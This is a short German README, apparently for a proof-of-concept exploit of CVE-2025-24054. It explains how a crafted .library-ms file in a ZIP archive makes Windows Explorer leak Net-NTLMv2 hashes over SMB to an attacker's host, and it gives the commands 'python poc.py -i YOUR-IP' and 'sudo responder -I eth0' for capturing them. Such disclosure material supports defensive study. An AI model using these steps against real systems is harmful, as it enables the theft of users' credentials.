
Proof-of-Concept-Exploit für CVE-2025-24054, eine Schwachstelle zur Offenlegung von NTLM-Hashes in Windows-Bibliotheken (.library-ms). Erzeugt eine schädliche .library-ms-Datei, um Net-NTLMv2-Hashes über SMB preiszugeben, wenn sie aus einem ZIP-Archiv extrahiert wird.
Ein einfacher Proof of Concept für CVE-2025-24054 – Windows-Bibliothek (.library-ms) NTLM-Hash-Offenlegungsschwachstelle.
⚠️ Nur für Bildungszwecke und autorisierte Labornutzung
CVE-2025-24054 ermöglicht es einem Angreifer, ein Windows-System zu zwingen, den Net-NTLMv2-Hash des Opfers preiszugeben, indem eine speziell präparierte .library-ms-Datei verwendet wird.
Wenn das Opfer ein ZIP extrahiert, das die bösartige .library-ms-Datei enthält, initiiert Windows Explorer automatisch eine SMB-Verbindung und gibt den NTLM-Hash preis.
.library-ms-Datei, die einen UNC-Pfad enthält, der auf seinen Rechner verweist.
python poc.py -i YOUR-IP
sudo responder -I eth0